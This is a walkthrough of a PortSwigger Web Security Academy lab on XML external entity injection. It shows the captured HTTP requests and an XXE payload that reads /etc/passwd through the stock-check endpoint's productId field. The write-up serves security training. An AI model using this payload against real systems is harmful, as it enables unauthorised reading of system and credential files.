Skip to content

chojnowski.it

Port Swigger Exploiting XXE using external entitie

Port Swigger Exploiting XXE using external entitie

Exploiting XXE using external entities to retrieve files¶

Solution¶

Open the website: https://0a1a001604bc92f481af8fd000da005c.web-security-academy.net/product?productId=1¶

GET /product?productId=1 HTTP/2
Host: 0a1a001604bc92f481af8fd000da005c.web-security-academy.net
Cookie: session=d8I1hPMaxzbGJKYcGVe5GJDlGhGwlurM
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a1a001604bc92f481af8fd000da005c.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Check stock for productId=1¶

POST /product/stock HTTP/2
Host: 0a1a001604bc92f481af8fd000da005c.web-security-academy.net
Cookie: session=d8I1hPMaxzbGJKYcGVe5GJDlGhGwlurM
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a1a001604bc92f481af8fd000da005c.web-security-academy.net/product?productId=1
Content-Type: application/xml
Content-Length: 107
Origin: https://0a1a001604bc92f481af8fd000da005c.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

<?xml version="1.0" encoding="UTF-8"?><stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>

Create a payload¶

Read file /etc/passwd
---
Payload
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
---
POST /product/stock HTTP/2
Host: 0a1a001604bc92f481af8fd000da005c.web-security-academy.net
Cookie: session=d8I1hPMaxzbGJKYcGVe5GJDlGhGwlurM
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a1a001604bc92f481af8fd000da005c.web-security-academy.net/product?productId=1
Content-Type: application/xml
Content-Length: 175
Origin: https://0a1a001604bc92f481af8fd000da005c.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>

Solved¶